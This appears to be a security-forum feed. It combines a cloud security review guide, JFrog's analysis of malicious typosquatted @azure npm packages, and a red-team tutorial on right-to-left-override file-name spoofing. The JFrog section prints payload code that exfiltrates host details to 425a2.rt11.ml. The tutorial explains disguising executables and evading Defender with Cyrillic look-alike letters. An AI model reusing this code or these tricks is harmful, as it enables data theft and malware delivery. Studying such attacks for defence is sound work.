The main ones you might want to look for are: Detection: Security Hub, GuardDuty, Inspector, Config, CloudTrail, Detective. Infrastructure protection: Firewall Manager, Shield, WAF. Data protection: Macie, CloudHSM. Relationships Between AWS Logging/Monitoring Services. For GCP, what “Security and identity” services are enabled? The main ones are: Detection: Security Command Center, Cloud Logging, Cloud IDS, Cloud Asset Inventory Infrastructure protection: Resource Manager, Identity-Aware Proxy, VPC Service Controls Data protection: Cloud Data Loss Prevention, Cloud Key Management What other (custom or third party) solutions have been deployed? For additional pointers, CloudSecDocs has sections describing off-the-shelf services for both AWS and GCP. Stage 9: Get the low-hanging fruits Finally, if you managed to reach this stage, you should have a clearer picture of the situation in the primary Cloud Provider. As a final stage for the Cloud-related phase of this review, you could then run a tactical scan (or benchmark suite) against your Organization. The quickest way to get a quick snapshot of vulnerabilities and misconfigurations in your estate is to reference Security Hub for AWS and Security Command Center for GCP. If they are already enabled, of course. Sample Dashboards for AWS Security Hub and GCP Security Command Center Otherwise, on CloudSecDocs you can find some additional tools for both testing (AWS, GCP, Azure) and auditing (AWS, GCP, Azure) environments. Note that this is not meant to be an exhaustive penetration test but a lightweight scan to identify high exposure and high impact misconfigurations or vulnerabilities already in Production. Subscribe to CloudSecList If you found this article interesting, you can join thousands of security professionals getting curated security-related news focused on the cloud native landscape by subscribing to CloudSecList.com. 
Subscribe Phase 2: Workloads Next, let’s focus on Workloads: the services powering the company’s business offerings. The main goal for this phase is to understand the current security maturity level of the different tech stacks involved. Stage 1: Understand the high-level business offerings As I briefly mentioned in the first part of this post, you can’t secure what you don’t understand. This concept becomes predominantly true when you are tasked with securing business workloads. Hence, here the goal is to understand what are the key functionalities your company offers to their customers: How many key functionalities does the company have? For example, if you are a banking company, these functionalities could be payments, transactions, etc. How are the main functionalities designed? Are they made by micro-services or a monolith? Is there a clear split between environment types? (i.e., Production, Staging, Testing, etc.) Which functionalities are critical? (i.e., both in terms of data and customer needs) Monolithic vs Microservice Architectures If you are fortunate, your company might have already undergone the process (and pain) to define a way to keep an inventory of business offerings and respective workloads and, most importantly, keep it up to date. Otherwise, like in most cases, you’ll have to partner with product teams to understand this. Then, try to map business functionalities to technical workloads, understanding their purpose for the business: Which ones are Internet-facing? Which ones are customer-facing? Which ones are time-critical? Which ones are stateful? Which ones are stateless? Which ones are batch processing? Which ones are back-office support? Stage 2: Identify the primary tech stack Once the key functionalities have been identified, you’ll want to split them by technologies. 
If you recall, the goal of Stage 3 (“Understand what is running in the Accounts”) of the Cloud-related phase of this review was to get a rough idea of what kind of technologies the company relies upon. Here is the time to go deeper by identifying what is the main stack. For the rest of the post, I’ll assume this can be one of the three following macro-categories (each can then have multiple declinations): Container-based (e.g., Kubernetes, ECS, etc.) Serverless (e.g., Lambda, Cloud Function, etc.) VM-based (e.g., vanilla EC2) Similar to the challenge we faced for Cloud Providers, it won’t be technically feasible to tackle everything simultaneously. Hence, start by identifying the primary tech stack, the one Production mainly relies upon, and start from it. Your company might probably rely on a mix (if not all) of those macro-areas: nonetheless, divide and conquer. Kubernetes vs Serverless vs VMs Once identified, consider this stack as your primary target. Go through the steps listed below, and only repeat them for the other technologies at the end. Stage 3: Understand the network architecture While in Stage 4 of the Cloud-related phase of the review you started making global considerations like what are the main entry points into the infrastructure or how do customers and engineers get access to the systems, in this stage the goal is to understand what the network architecture of the workloads looks like. Depending on the macro-category of technologies involved, you can ask different questions. Kubernetes: Which (and how many) clusters do we have? Are they regional or zonal? Are they managed (EKS, GKE, AKS) or self-hosted? How do the clusters communicate with each other? What are the network boundaries? Are clusters single or multi-tenant? Are either the control plane or nodes exposed over the Internet? How do engineers connect? How can they run kubectl? Do they use a bastion or something like Teleport? What are the Ingresses? 
Are there any stateful workloads running in these clusters? Kubernetes Trust Boundaries - Courtesy of CNCF Serverless: Which types of data stores are being used? For example, SQL-based (e.g., RDS), NoSQL (e.g., DynamoDB), or Document-based (e.g., DocumentDB)? Which types of application workers are being used? For example, Lambda or Cloud Functions? Is an API Gateway (incredibly, named the same way by both AWS and GCP!) being used? What is used to decouple the components? For example, SQS or Pub/Sub? A high-level architecture diagram of an early version of CloudSecList.com VMs: What Virtual Machines are directly exposed to the Internet? Which Operating Systems (and versions) are being used? How are hosts hardened? How do engineers connect? Do they SSH directly into the hosts, or is a remote session manager (e.g., SSM or OS Login) used? What’s a pet, and what’s cattle? Stage 4: Understand the current IAM setup In this stage, the goal is to understand how authentication and authorization to workloads are currently set up. These questions are general, regardless of the technology type: How are engineers interacting with workloads? How do they troubleshoot them? How is authorization enforced? Is the principle of least privilege generally followed, or are overly permissive (non fine-tuned) policies usually used? How is Role-Based Access Control (RBAC) used? How is it set up, enforced, and audited? Are workloads accessing any other cloud-native services (e.g., buckets, queues, databases)? If yes, how are authentication and authorization to Cloud Providers set up and enforced? Are they federated, maybe via OpenID Connect (OIDC)? Are workloads accessing any third party services? If yes, how are authentication and authorization set up and enforced? OIDC Federation of Kubernetes in AWS - Courtesy of @mjarosie For additional pointers, CloudSecDocs has sections describing how authentication and authorization in Kubernetes work.
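As a rough illustration of the "overly permissive policies" question in this stage, the sketch below scans an AWS-style IAM policy document for Allow statements that combine a wildcard action with a wildcard resource. It is only a first-pass heuristic under stated assumptions: the helper names (`_as_list`, `overly_permissive_statements`) are hypothetical, the policy is assumed to be already loaded as a Python dict, and conditions, NotAction, and NotResource are deliberately ignored.

```python
from typing import Any, Dict, List


def _as_list(value: Any) -> List[Any]:
    """IAM allows a single value or a list in most fields; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def overly_permissive_statements(policy: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return Allow statements that pair a wildcard action with Resource "*"."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a for a in _as_list(stmt.get("Action")) if isinstance(a, str)]
        resources = _as_list(stmt.get("Resource"))
        # "*" alone or "service:*" both count as a wildcard action here.
        wildcard_action = any(a == "*" or a.endswith(":*") for a in actions)
        wildcard_resource = "*" in resources
        if wildcard_action and wildcard_resource:
            findings.append(stmt)
    return findings


if __name__ == "__main__":
    policy = {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
            {"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::bucket/*"},
        ],
    }
    for stmt in overly_permissive_statements(policy):
        print("review:", stmt)
```

The point at this stage is to spot the general trend rather than audit every policy, so a coarse filter like this is usually enough to tell whether wildcards are the norm or the exception.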
Stage 5: Understand the current monitoring setup The goal of this stage is to understand which logs are collected (and how) from workloads. Some of the questions to ask are general, regardless of the technology type: Are security-related logs collected at all? What kinds of logs are already being ingested? How are logs collected? Where are the logs forwarded? These can then be adapted and tailored to the relevant tech type. Kubernetes: Are audit logs collected? Are System Calls and Kubernetes Audit Events collected via Falco? Is a data collector like fluentd used to collect logs? Is the data collector deployed as a Sidecar or DaemonSet? High-Level Architecture of Falco For additional pointers, CloudSecDocs has a section focused on Falco and its usage. Serverless: How are applications instrumented? Are metrics and logs collected via a data collector like X-Ray or Datadog? Sample X-Ray Dashboard VMs: For AWS, is the CloudWatch Logs agent used to send log data to CloudWatch Logs from EC2 instances automatically? For GCP, is the Ops Agent used to collect telemetry from Compute Engine instances? Is an agent like osquery used to provide endpoint visibility? Stage 6: Understand the current secrets management setup In this stage, the goal is to understand how secrets are made available to workloads to consume. Where are workloads fetching secrets from? How are secrets made available to workloads? Via environment variables, filesystem, etc.? Do workloads also generate secrets, or are they limited to consuming them? Is there a practice of hardcoding secrets? Assuming a secrets management solution (like HashiCorp Vault, AWS Secrets Manager, or GCP Secret Manager) is being used, how are workloads authenticating? What about authorization (RBAC)? Are secrets bound to a specific workload, or is any workload able to potentially fetch any other secret? Is there any separation or boundary? Are processes around secrets management defined?
What about rotation and revocation of secrets? Vault's Sidecar for Kubernetes - Courtesy of HashiCorp Stage 7: Identify existing security controls In this stage, the goal is to understand which controls have already been implemented. It is unfeasible to list them all here, as they can depend highly on your actual workloads. Nonetheless, try to gather information about what has already been deployed. For example: Any admission controllers (e.g., OPA Gatekeeper) or network policies in Kubernetes? Any third party agent for VMs? Any custom or third party solution? Specifically for Kubernetes, CloudSecDocs has a few sections describing focus areas and security checklists. Stage 8: Get the low-hanging fruits As a final stage for the Workloads-related phase of this review, you could then run a tactical scan (or benchmark suite) against your key functionalities. As for the previous stage, this is highly dependent on the actual functionalities and workloads developed within your company. Nonetheless, on CloudSecDocs you can find additional tools for testing and auditing Kubernetes clusters. Note that this is not meant to be an exhaustive penetration test but a lightweight scan to identify high exposure and high impact misconfigurations or vulnerabilities already in Production. Phase 3: Code Those paying particular attention might have noticed that I haven’t mentioned the words source code a single time so far. That’s not because I think code is not essential. Quite the opposite, as I reckon it deserves a phase of its own. Thus, the main goal for this phase is to complete the review by mapping the environments and workloads to their originating source code and understanding how code reaches Production. Stage 1: Understand the code’s structure The goal of this stage is to understand how code is structured, as it will significantly affect the strategies you will have to use to secure it. 
Conway’s Law does a great job in capturing this concept: Any organization that designs a system (defined broadly) will produce a design whose structure is a copy of the organization’s communication structure. Meaning that software usually ends up “shaped like” the organizational structure they are designed in or designed for. Visualization of Conway's Law - Courtesy of Manu Cornet In technical terms, the primary distinction to make is about monorepo versus multi-repos philosophy for code organization: The monorepo approach uses a single repository to host all the code for the multiple libraries or services composing a company’s projects. The multi-repo approach uses several repositories to host the multiple libraries or services of a project developed by a company. I will probably blog more in the future about how each of these philosophies affects security, but for now, try to understand how is the company designed and where the code is. Then, look for which security controls are already added to the repositories: Are CODEOWNERS being utilized? Are there any protected branches? Are code reviews via Pull Requests being enforced? Are linters automatically run on the developers’ machines before raising a Pull Request? Are static analysis tools (for the relevant technologies used) automatically run on the developers’ machines before raising a Pull Request? Are secrets detection tools (e.g., git-secrets) automatically run on the developers’ machines before raising a Pull Request? Stage 2: Understand the adoption of Infrastructure as Code The goal of this stage is to understand which resources are defined as code, and which are created manually. Which Infrastructure as Code (IaC) frameworks are being used? Are Cloud environments managed via IaC? If not, what is being excluded? Are Workloads managed via IaC? If not, what is being excluded? How are third party modules sourced and vetted? 
Adoption of different IaC frameworks - Courtesy of The New Stack Stage 3: Understand how CI/CD is set up In this stage, the goal is to understand how code is built and deployed to Production. What CI/CD platform (e.g., GitHub, GitLab, Jenkins, etc.) is being used? Is IaC, for both Cloud environments and Workloads, automatically deployed via CI/CD? How is Terraform applied? How are container images built? Is IaC automatically tested and validated in the pipeline? Is static analysis of Terraform code performed? (see Compliance as Code - Terraform on CloudSecDocs). Is static validation of deployments (e.g., Kubernetes manifests, Dockerfiles, etc.) performed? (see Compliance as Code - OPA on CloudSecDocs). Are containers automatically scanned for known vulnerabilities? (see Container Scanning Strategies on CloudSecDocs). Are dependencies automatically audited and scanned for vulnerabilities? Pipeline for container images - Courtesy of Sysdig How is code provenance guaranteed? Are all container images generated from a set of chosen and hardened base images? (see Secure Dockerfiles on CloudSecDocs). Are all the workloads fetching container images from a secure and hardened container registry? (see Image Pipeline on CloudSecDocs). For Kubernetes, is Binary Authorization enforced to ensure only trusted container images are deployed to the infrastructure? (see Binary Authorization on CloudSecDocs). Is a framework (like TUF, in-toto, providence) utilized to protect the integrity of the Supply Chain? (see Pipeline Supply Chain on CloudSecDocs). Have other security controls been embedded in the pipeline? Are there any documented processes for infrastructure and configuration changes? Is there a documented Secure Software Development Life Cycle (SSDLC) process? Stage 4: Understand how the CI/CD platform is secured Finally, the goal of this stage is to understand how the chosen CI/CD platform itself is secured.
In fact, as time passes, CI/CD platforms are becoming focal points for security teams, as a compromise of such systems might mean a total compromise of the overall organization. A few questions to ask: How is access control defined? Who has access to the CI/CD platform? How does the CI/CD platform authenticate to code repositories? How does the CI/CD platform authenticate to Cloud Providers and their environments? How are credentials to those systems managed? Is the blast radius of a potential compromise limited? Is the principle of least privilege followed? Are long-running (static) keys generally used, or are short-lived tokens (e.g., via OIDC) usually preferred? Credentials management in a pipeline - Courtesy of WeaveWorks What do the security monitoring and auditing of the CI/CD platform look like? Are CI runners hardened? Is there any isolation between CI and CD? How are 3rd party workflows sourced and vetted? Security mitigations for CI/CD pipelines - Courtesy of Mercari For additional pointers, CloudSecDocs has a section focused on CI/CD Providers and their security. Let’s put it all together Thanks for making it this far! Hopefully, going through this exercise will allow you to have a clearer picture of your company’s current security maturity level. Plus, as a side-effect, you should now have a rough idea of the most critical areas which deserve more scrutiny. The goal from here is to use the knowledge you uncovered to put together a well-thought-out roadmap that addresses both short-term goals (a.k.a. extinguishing the fires) and long-term goals (a.k.a. improving the overall security and maturity of the organization). For convenience, here are all the stages of the review, grouped by phase, gathered in one handy chart: The Stages of the Review, by Phase As the last recommendation, it is crucial not to lose the invaluable knowledge you gathered throughout this review. The suggestion is to document as you go: Keep a journal (or wiki) of what you discover.
Bonus points if it’s structured and searchable, as it will simplify keeping it up to date. Start creating a risk registry of all the risks you discover as you go. You might not be able to tackle them all now, but it will be invaluable to drive the long term roadmap and share areas of concern with upper management. Conclusions In this post, part of the “Cloud Security Strategies” series, I presented a comprehensive guide that offers a structured approach to reviewing the security architecture of a multi-cloud SaaS company and finding its most critical components. It does represent my perspective and reflects my experiences, so it definitely won’t be a “one size fits all”, but I hope it can be a helpful baseline. I hope you found this post valuable and interesting, and I’m keen to get feedback on it! If you found the information shared helpful, or if something is missing, or if you have ideas on how to improve it, please let me know on Twitter or at feedback.marcolancini.it. Thank you! Source: https://www.marcolancini.it/2022/blog-cloud-security-infrastructure-review/

-

I think they sent you a request for all of those items and you approved it, without realizing what you were giving away. Apparently anyone can see what you have in your inventory and ask you for whatever they want. Steam asks you, and if you click "Accept" the items go to that person. So, if that is what happened, I'm not sure there is anything you can do other than try talking to support. Besides, what do you even do with them? That junk is good for nothing. PS: If you play CS:GO on AWP-only servers, give me a shout; I also play in the evening (at night, actually).

-

Large-scale npm attack targets Azure developers with malicious packages
The JFrog Security Research team identified hundreds of malicious packages designed to steal PII in a large-scale typosquatting attack
By Andrey Polkovnychenko and Shachar Menashe, March 23, 2022
The JFrog Security research team continuously monitors popular open source software (OSS) repositories with our automated tooling to avert potential software supply chain security threats, and reports any vulnerabilities or malicious packages discovered to repository maintainers and the wider community. Two days ago, several of our automated analyzers started alerting on a set of packages in the npm Registry. This particular set of packages steadily grew over a few days, from about 50 packages to more than 200 packages (as of March 21st). After manually inspecting some of these packages, it became apparent that this was a targeted attack against the entire @azure npm scope, by an attacker that employed an automatic script to create accounts and upload malicious packages that cover the entirety of that scope. Currently, the observed malicious payloads of these packages are PII (personally identifiable information) stealers. The entire set of malicious packages was disclosed to the npm maintainers and the packages were quickly removed. Who is being targeted? The attacker seemed to target all npm developers that use any of the packages under the @azure scope, with a typosquatting attack. In addition to the @azure scope, a few packages from the following scopes were also targeted: @azure-rest, @azure-tests, @azure-tools and @cadl-lang. Since this set of legitimate packages is downloaded tens of millions of times each week, there is a high chance that some developers will be successfully fooled by the typosquatting attack. What software supply chain attack method is used?
The attack method is typosquatting: the attacker simply creates a new (malicious) package with the same name as an existing @azure scope package, but drops the scope name. [Screenshots: a legitimate @azure npm package and its malicious counterpart] This was done for (at least) 218 packages. The full list of disclosed packages is posted on JFrog’s security research website and as an Appendix to this post. The attacker is relying on the fact that some developers may erroneously omit the @azure prefix when installing a package. For example, running "npm install core-tracing" by mistake, instead of the correct command, "npm install @azure/core-tracing". In addition to the typosquatting infection method, all of the malicious packages had extremely high version numbers (e.g., 99.10.9), which is indicative of a dependency confusion attack. A possible conjecture is that the attacker tried to target developers and machines running from internal Microsoft/Azure networks, in addition to the typosquatting-based targeting of regular npm users. We did not pursue research on this attack vector, and as such this is just a conjecture. Blurring the attack origins using automation Due to the scale of the attack, it is obvious that the attacker used a script to upload the malicious packages. The attacker also tried to hide the fact that all of these malicious packages were uploaded by the same author, by creating a unique user (with a randomly-generated name) for each malicious package uploaded. Technical analysis of the malicious payload As mentioned, the malicious payload of these packages was a PII stealing/reconnaissance payload.
The malicious code runs automatically once the package is installed, and leaks the following details: a directory listing of the following directories (non-recursive): C:\, D:\, / and /home; the user’s username; the user’s home directory; the current working directory; the IP addresses of all network interfaces; the IP addresses of configured DNS servers; and the name of the (successful) attacking package.

    const td = {
        p: package,
        c: __dirname,
        hd: os.homedir(),
        hn: os.hostname(),
        un: os.userInfo().username,
        dns: JSON.stringify(dns.getServers()),
        ip: JSON.stringify(gethttpips()),
        dirs: JSON.stringify(getFiles(["C:\\","D:\\","/","/home"])),
    }

These details are leaked via two exfiltration vectors: an HTTPS POST to the hardcoded hostname “425a2.rt11.ml”, and a DNS query to “<HEXSTR>.425a2.rt11.ml”, where <HEXSTR> is replaced with the leaked details, concatenated together as a hex-string:

    var hostname = "425a2.rt11.ml";
    query_string=toHex(pkg.hn)+"."+toHex(pkg.p)+"."+toHex(pkg.un)+"."+getPathChunks(pkg.c)+"."+getIps()+"."+hostname;
    ...
    dns.lookup(query_string)

We suspect that this malicious payload was either intended for initial reconnaissance on vulnerable targets (before sending a more substantial payload) or as a bug bounty hunting attempt against Azure users (and possibly Microsoft developers). The code also contains a set of clumsy tests that presumably make sure the malicious payload does not run on the attacker’s own machines:

    function isValid(hostname, path, username, dirs) {
        if (hostname == "DESKTOP-4E1IS0K" && username == "daasadmin" && path.startsWith('D:\\TRANSFER\\')) {
            return false;
        }
        ...
        else if (hostname == 'lili-pc') {
            return false;
        }
        ...
        else if (hostname == 'aws-7grara913oid5jsexgkq') {
            return false;
        }
        ...
        else if (hostname == 'instance') {
            return false;
        }
        ...
        return true;
    }

I am using JFrog Xray, am I protected? JFrog Xray users are protected from this attack.
The JFrog security research team adds all verified findings, such as discovered malicious packages and zero-day vulnerabilities in open-source packages, to our Xray database before any public disclosure. Any usage of these malicious packages is flagged in Xray as a vulnerability. As always, any malicious dependency flagged in Xray should be promptly removed. I am an Azure developer using a targeted package, what should I do? Make sure your installed packages are the legitimate ones, by checking that their name starts with the @azure* scope. This can be done, for example, by changing your current directory to the npm project you would like to test, and running the following command – npm list | grep -f packages.txt Where “packages.txt” contains the full list of affected packages (see Appendix A). If any of the returned results does not begin with an “@azure*” scope, you might have been affected by this attack. Conclusion Luckily, since the packages were detected and disclosed very quickly (~2 days after they were published), it seems that they weren’t installed in large numbers. The package download numbers were uneven, but averaged around 50 downloads per package. It is clear that the npm maintainers are taking security very seriously. This was demonstrated many times by their actions, such as the preemptive blocking of specific package names to avoid future typosquatting and their two-factor-authentication requirement for popular package maintainers. However – due to the meteoric rise of supply chain attacks, especially through the npm and PyPI package repositories, it seems that more scrutiny and mitigations should be added. For example, adding a CAPTCHA mechanism on npm user creation would not allow attackers to easily create an arbitrary amount of users from which malicious packages could be uploaded, making attack identification easier (as well as enabling blocking of packages based on heuristics on the uploading account). 
In addition to that, the need for automatic package filtering as part of a secure software curation process, based on either SAST or DAST techniques (or preferably – both), is likely inevitable. Beyond the security capabilities provided with Xray, JFrog is providing several open-source tools that can help with identifying malicious npm packages. These tools can either be integrated into your current CI/CD pipeline, or be run as standalone utilities. Stay Up-to-Date with JFrog Security Research Follow the latest discoveries and technical updates from the JFrog Security Research team in our security research website and on Twitter at @JFrogSecurity. Appendix A – The detected malicious packages agrifood-farming ai-anomaly-detector ai-document-translator arm-advisor arm-analysisservices arm-apimanagement arm-appconfiguration arm-appinsights arm-appplatform arm-appservice arm-attestation arm-authorization arm-avs arm-azurestack arm-azurestackhci arm-batch arm-billing arm-botservice arm-cdn arm-changeanalysis arm-cognitiveservices arm-commerce arm-commitmentplans arm-communication arm-compute arm-confluent arm-consumption arm-containerinstance arm-containerregistry arm-containerservice arm-cosmosdb arm-customerinsights arm-databox arm-databoxedge arm-databricks arm-datacatalog arm-datadog arm-datafactory arm-datalake-analytics arm-datamigration arm-deploymentmanager arm-desktopvirtualization arm-deviceprovisioningservices arm-devspaces arm-devtestlabs arm-digitaltwins arm-dns arm-dnsresolver arm-domainservices arm-eventgrid arm-eventhub arm-extendedlocation arm-features arm-frontdoor Arm-hanaonazure arm-hdinsight arm-healthbot arm-healthcareapis arm-hybridcompute arm-hybridkubernetes arm-imagebuilder arm-iotcentral arm-iothub arm-keyvault arm-kubernetesconfiguration arm-labservices arm-links arm-loadtestservice arm-locks arm-logic arm-machinelearningcompute arm-machinelearningexperimentation arm-machinelearningservices arm-managedapplications arm-managementgroups 
arm-managementpartner arm-maps arm-mariadb arm-marketplaceordering arm-mediaservices arm-migrate arm-mixedreality arm-mobilenetwork arm-monitor arm-msi arm-mysql arm-netapp arm-network arm-notificationhubs arm-oep arm-operationalinsights arm-operations arm-orbital arm-peering arm-policy arm-portal arm-postgresql arm-postgresql-flexible arm-powerbidedicated arm-powerbiembedded arm-privatedns arm-purview arm-quota arm-recoveryservices arm-recoveryservices-siterecovery arm-recoveryservicesbackup arm-rediscache arm-redisenterprisecache arm-relay arm-reservations arm-resourcegraph arm-resourcehealth arm-resourcemover arm-resources arm-resources-subscriptions arm-search arm-security arm-serialconsole arm-servicebus arm-servicefabric arm-servicefabricmesh arm-servicemap arm-signalr arm-sql arm-sqlvirtualmachine arm-storage arm-storagecache arm-storageimportexport arm-storagesync arm-storsimple1200series arm-storsimple8000series arm-streamanalytics arm-subscriptions arm-support arm-synapse arm-templatespecs arm-timeseriesinsights arm-trafficmanager arm-videoanalyzer arm-visualstudio arm-vmwarecloudsimple arm-webpubsub arm-webservices arm-workspaces cadl-autorest cadl-azure-core cadl-azure-resource-manager cadl-playground cadl-providerhub cadl-providerhub-controller cadl-providerhub-templates-contoso cadl-samples codemodel communication-chat communication-common communication-identity communication-network-traversal communication-phone-numbers communication-short-codes communication-sms confidential-ledger core-amqp core-asynciterator-polyfill core-auth core-client-1 core-http core-http-compat core-lro core-paging core-rest-pipeline core-tracing core-xml deduplication digital-twins-core dll-docs dtdl-parser eslint-config-cadl eslint-plugin-azure-sdk eventhubs-checkpointstore-blob eventhubs-checkpointstore-table extension-base helloworld123ccwq identity-cache-persistence identity-vscode iot-device-update iot-device-update-1 iot-modelsrepository keyvault-admin 
mixed-reality-authentication mixed-reality-remote-rendering modelerfour monitor-opentelemetry-exporter oai2-to-oai3 openapi3 opentelemetry-instrumentation-azure-sdk pnpmfile.js prettier-plugin-cadl purview-administration purview-catalog purview-scanning quantum-jobs storage-blob-changefeed storage-file-datalake storage-queue synapse-access-control synapse-artifacts synapse-managed-private-endpoints synapse-monitoring synapse-spark test-public-packages test-utils-perf testing-recorder-new testmodeler video-analyzer-edge videojs-wistia web-pubsub web-pubsub-express

Source: https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/
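A list like Appendix A can be checked against a project's manifest. The following is only a minimal sketch, not one of the JFrog tools mentioned above: `findFlaggedDependencies`, `sampleManifest` and `sampleFlagged` are hypothetical names, and the sketch assumes that an exact, case-sensitive name match is what you want. A scoped name such as `@azure/core-http` is a different package name and is therefore not matched by `core-http`.

```javascript
// Hypothetical helper (not a JFrog tool): flag dependencies whose exact
// name appears on a list of known-malicious package names.
const DEPENDENCY_FIELDS = [
  "dependencies",
  "devDependencies",
  "optionalDependencies",
  "peerDependencies",
];

function findFlaggedDependencies(manifest, flaggedNames) {
  const flagged = new Set(flaggedNames);
  const hits = [];
  for (const field of DEPENDENCY_FIELDS) {
    // A missing field is treated as an empty dependency map.
    for (const name of Object.keys(manifest[field] || {})) {
      if (flagged.has(name)) {
        hits.push({ field, name });
      }
    }
  }
  return hits;
}

// Illustrative data only: a parsed package.json and a few names from the list.
const sampleManifest = {
  dependencies: { "core-tracing": "^1.0.0", "@azure/core-http": "^2.0.0" },
  devDependencies: { "test-utils-perf": "*" },
};
const sampleFlagged = ["core-tracing", "core-http", "test-utils-perf"];

console.log(findFlaggedDependencies(sampleManifest, sampleFlagged));
```

In practice the manifest would come from `JSON.parse` on the contents of `package.json`, and the flagged names from the full appendix. Transitive dependencies are not covered by this check.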

-

Initial Access - Right-To-Left Override [T1036.002]

21 Mar 2022

You have probably heard that Microsoft will soon disable macros in documents that come from the internet (https://docs.microsoft.com/en-us/deployoffice/security/internet-macros-blocked). It got me thinking: what other alternatives are there for gaining initial access to the target’s environment, and what kind of payloads can we deliver? While browsing MITRE ATT&CK I came across a pretty old technique known as the right-to-left override (RTLO) attack. If you have never heard of it, I will try to explain it briefly.

Some languages are written from left to right, like English and German. Others are written from right to left, like Arabic and Hebrew. By default, Windows displays text from left to right, but since it supports other languages it also supports right-to-left text. There is a Unicode character, the right-to-left override (U+202E), that flips the text that follows it, and you can combine it with existing text. Basically, you can reverse text in file names and that way hide the true file extension.

Note: In my examples Windows is set up to show file extensions. By default file extensions are hidden. I believe there is no point in performing this type of extension spoofing if the target Windows system is hiding file extensions.

I have written a simple tool in C# that spoofs the extension of a desired executable and changes its icon to anything you specify.

How to use the tool?

The tool accepts two arguments: the first is the input executable and the second is the icon. The usage is easiest to explain through examples. First, you need to rename your executable to suit the required format before passing it to the tool. Make sure that the extension you would like to spoof is the last part before the true extension.
For example, if you want to make a file look like “.png”, make sure your executable name is something like “simple.exemple.png.exe”. Also make sure that the true extension, say “.exe” or “.scr”, is present in the filename, whether in its true form or reversed (“exe.” or “rcs.”), as in “simple.exemple.png.exe”. (More details on the reversed extension below.) Once you have renamed your executable to match the required format, pass it to the tool as the first argument along with the desired icon:

./rtlo-attack.exe simple.exemple.png.exe png.ico

The tool works by taking the file extension (“.exe” in the previous example) and finding a match for it inside the executable’s name. After the match is found, it adds rtlo and ltro characters to hide the actual extension and preserve the ordinary-looking name. If you are interested in more details, take a look at the source code.

Additional obfuscation

As I mentioned a few paragraphs above, you can also reverse the true file extension to obfuscate it even more. Let’s take a look at the next example. I am going to use the “.scr” extension, since reversing “.exe” doesn’t look much different.

Note: To create an “.scr” executable, just change the file extension from “.exe” to “.scr” and the executable will still run.

So let’s rename an executable to meet the filename format requirements before we pass it to the tool. Rename the executable to something like “My-picturcs.png.scr” and pass it to the tool. Notice how we specified the true file extension, but in reverse (“rcs.”), in the file name. After the tool has done its magic, the resulting executable name will look like this: “My-picturcs.png”.

The other interesting way of obfuscating is changing the extension’s casing. Since Windows doesn’t care about lower or upper case, you can have an extension such as “.exE”. An example executable can look like this: “My.exEnvironment.png.exE”, and the output would end up looking like this: “My.exEnvironment.png”.
Name ideas:

| Original name | Spoofed name |
| --- | --- |
| Company.Executive.Summary.txt.Exe | Company.Executive.Summary.txt |
| SOMETHINGEXe.png.eXE | SOMETHINGEXe.png |

What about anti-virus?

You might have noticed that some AVs, like Microsoft’s Defender, flag a file with an RTLO character in its name. Fortunately, someone has already researched that part. The author of http://blog.sevagas.com/?Bypass-Defender-and-other-thoughts-on-Unicode-RTLO-attacks concluded that an AV might flag the file if it contains an RTLO character and ends with a valid extension. I will summarize it below, but I encourage you to read the article. For example, if you spoof the file name to look like “smth.executive.summary.txt” it will be flagged by the AV, but if the name is “smth.executive.summary.blah” it will not. If only there were a way to make an extension look legitimate without actually being valid…

Of course there is a way. Since we are already playing with different languages, why not use letters from different alphabets? For example, the payload “smth.executive.summary.txt” is flagged by the AV, but “smth.executive.summary.tхt” is not, since the “х” (\u0445) is not the Latin letter “x” (\u0078) but the Cyrillic letter for the “h” sound. Simply copy the Unicode character from any Unicode table website and paste it into the file name, and it will do the trick.

Note: There are a variety of executable file extensions, but keep in mind that not all of them can have a custom icon. For example, you can’t change the icon of the “.bat” or “.com” file types.

But how do we deliver it?

One option would be to make your target download a ZIP archive or an ISO/VHD image. An ISO image is automatically mounted by Windows when double-clicked, and since it is a different file system format it would bypass the so-called mark-of-the-web (MOTW). But that is content for another post.

The end!

Source: https://www.exandroid.dev/2022/03/21/initial-access-right-to-left-override-t1036002/
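From the defender's side, the two tricks described in this post (a bidirectional override character in the name, and a look-alike letter from another alphabet in the extension) can be checked for mechanically. What follows is a rough sketch under stated assumptions, not how Defender or any other AV works: `inspectFileName` and the finding labels are hypothetical, and only Latin/Cyrillic mixing is checked.

```javascript
// Hypothetical helper: report signs of the spoofing tricks described above.
// Bidirectional formatting characters: U+202A..U+202E and U+2066..U+2069.
const BIDI_CONTROL = /[\u202A-\u202E\u2066-\u2069]/;
const BIDI_CONTROL_ALL = /[\u202A-\u202E\u2066-\u2069]/g;

function inspectFileName(name) {
  const findings = [];
  if (BIDI_CONTROL.test(name)) {
    findings.push("bidi-control");
  }
  // Work on the logical (stored) character order, which is what the OS
  // uses to decide how the file is opened.
  const logical = name.replace(BIDI_CONTROL_ALL, "");
  const dot = logical.lastIndexOf(".");
  const extension = dot >= 0 ? logical.slice(dot + 1) : "";
  // A dot-separated part that mixes Latin and Cyrillic letters is suspicious.
  const mixed = logical
    .split(".")
    .some((part) => /\p{Script=Latin}/u.test(part) && /\p{Script=Cyrillic}/u.test(part));
  if (mixed) {
    findings.push("mixed-script");
  }
  return { extension, findings };
}

// Illustrative inputs only (made-up names).
console.log(inspectFileName("invoice\u202Efdp.exe")); // stored extension is "exe"
console.log(inspectFileName("summary.t\u0445t"));     // Cyrillic letter inside "txt"
console.log(inspectFileName("report.txt"));           // no findings
```

The design choice here is to report the extension as stored rather than as displayed, because the displayed order is exactly what the override character manipulates.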

-

Authentication firm Okta probes report of digital breach

Nytro replied to Dragos's topic in Stiri securitate

https://www.bleepingcomputer.com/news/security/okta-confirms-25-percent-customers-impacted-by-hack-in-january/ -

Browser-in-the-Browser Attack Makes Phishing Nearly Invisible

Author: Lisa Vaas
March 21, 2022 7:57 pm

Can we trust web browsers to protect us, even if they say “https?” Not with the novel BitB attack, which fakes popup SSO windows to phish away credentials for Google, Facebook and Microsoft, et al.

